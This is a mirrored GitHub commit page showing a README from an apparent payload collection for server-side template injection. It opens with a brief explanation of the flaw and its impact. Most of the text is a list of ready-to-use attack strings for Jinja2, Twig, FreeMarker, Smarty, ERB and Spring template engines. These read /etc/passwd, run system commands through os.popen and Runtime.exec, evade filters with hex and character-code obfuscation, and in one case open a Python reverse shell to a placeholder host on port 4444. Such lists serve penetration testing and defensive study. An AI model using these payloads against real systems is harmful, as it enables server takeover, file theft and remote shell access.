mirror of
https://github.com/payloadbox/ssti-payloads.git
synced 2025-12-17 09:45:31 +00:00
Update README.md
This commit is contained in:
İsmail Taşdelen
GitHub
parent
1e696c98c4
commit
180033d67f
92
README.md
92
README.md
@ -1 +1,93 @@
|
||||
## Server Side Template Injection Payloads
|
||||
|
||||
|
||||
<img src="https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg"> <img src="https://img.shields.io/github/stars/payloadbox/ssti-payloads?style=social"> <img src="https://img.shields.io/github/forks/payloadbox/ssti-payloads?style=social"> <img src="https://img.shields.io/github/repo-size/payloadbox/csv-injection-payloads"> <img src="https://img.shields.io/github/license/payloadbox/ssti-payloads"> <img src="https://img.shields.io/github/issues/detail/author/payloadbox/csv-injection-payloads/1">
|
||||
|
||||
Server-side template injection is when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side.
|
||||
|
||||
Template engines are designed to generate web pages by combining fixed templates with volatile data. Server-side template injection attacks can occur when user input is concatenated directly into a template, rather than passed in as data. This allows attackers to inject arbitrary template directives in order to manipulate the template engine, often enabling them to take complete control of the server. As the name suggests, server-side template injection payloads are delivered and evaluated server-side, potentially making them much more dangerous than a typical client-side template injection.
|
||||
|
||||
#### Impact :
|
||||
|
||||
Server-side template injection vulnerabilities can expose websites to a variety of attacks depending on the template engine in question and how exactly the application uses it. In certain rare circumstances, these vulnerabilities pose no real security risk. However, most of the time, the impact of server-side template injection can be catastrophic.
|
||||
|
||||
At the severe end of the scale, an attacker can potentially achieve remote code execution, taking full control of the backend server and using it to perform other attacks on internal infrastructure.
|
||||
|
||||
Even in cases where full remote code execution is not possible, an attacker can often still use server-side template injection as the basis for numerous other attacks, potentially gaining read access to sensitive data and arbitrary files on the server.
|
||||
|
||||
#### Payloads :
|
||||
|
||||
```
|
||||
{{2*2}}[[3*3]]
|
||||
{{3*3}}
|
||||
{{3*'3'}}
|
||||
<%= 3 * 3 %>
|
||||
${6*6}
|
||||
${{3*3}}
|
||||
@(6+5)
|
||||
#{3*3}
|
||||
#{ 3 * 3 }
|
||||
{{dump(app)}}
|
||||
{{app.request.server.all|join(',')}}
|
||||
{{config.items()}}
|
||||
{{ [].class.base.subclasses() }}
|
||||
{{''.class.mro()[1].subclasses()}}
|
||||
{{ ''.__class__.__mro__[2].__subclasses__() }}
|
||||
{% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}
|
||||
{{'a'.toUpperCase()}}
|
||||
{{ request }}
|
||||
{{self}}
|
||||
<%= File.open('/etc/passwd').read %>
|
||||
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
|
||||
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
|
||||
${"freemarker.template.utility.Execute"?new()("id")}
|
||||
{{app.request.query.filter(0,0,1024,{'options':'system'})}}
|
||||
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
|
||||
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}
|
||||
{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
|
||||
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
|
||||
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
|
||||
{$smarty.version}
|
||||
{php}echo `id`;{/php}
|
||||
{{['id']|filter('system')}}
|
||||
{{['cat\x20/etc/passwd']|filter('system')}}
|
||||
{{['cat$IFS/etc/passwd']|filter('system')}}
|
||||
{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
|
||||
{{request|attr(["_"*2,"class","_"*2]|join)}}
|
||||
{{request|attr(["__","class","__"]|join)}}
|
||||
{{request|attr("__class__")}}
|
||||
{{request.__class__}}
|
||||
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
|
||||
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
|
||||
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
|
||||
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
|
||||
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
|
||||
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
|
||||
${T(java.lang.System).getenv()}
|
||||
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
|
||||
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
|
||||
```
|
||||
|
||||
#### References :
|
||||
|
||||
* 👉 https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server_Side_Template_Injection
|
||||
* 👉 https://portswigger.net/research/server-side-template-injection
|
||||
* 👉 https://www.indusface.com/learning/application-security/server-side-template-injection/
|
||||
|
||||
##### Cloning an Existing Repository ( Clone with HTTPS )
|
||||
```
|
||||
root@ismailtasdelen:~# git clone https://github.com/payloadbox/ssti-payloads.git
|
||||
```
|
||||
|
||||
##### Cloning an Existing Repository ( Clone with SSH )
|
||||
```
|
||||
root@ismailtasdelen:~# git clone git@github.com:payloadbox/ssti-payloads.git
|
||||
```
|
||||
|
||||
#### Donate!
|
||||
|
||||
Support the authors:
|
||||
|
||||
#### LiberaPay:
|
||||
|
||||
<noscript><a href="https://liberapay.com/ismailtasdelen/donate"><img alt="Donate using Liberapay" src="https://liberapay.com/assets/widgets/donate.svg"></a></noscript>
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user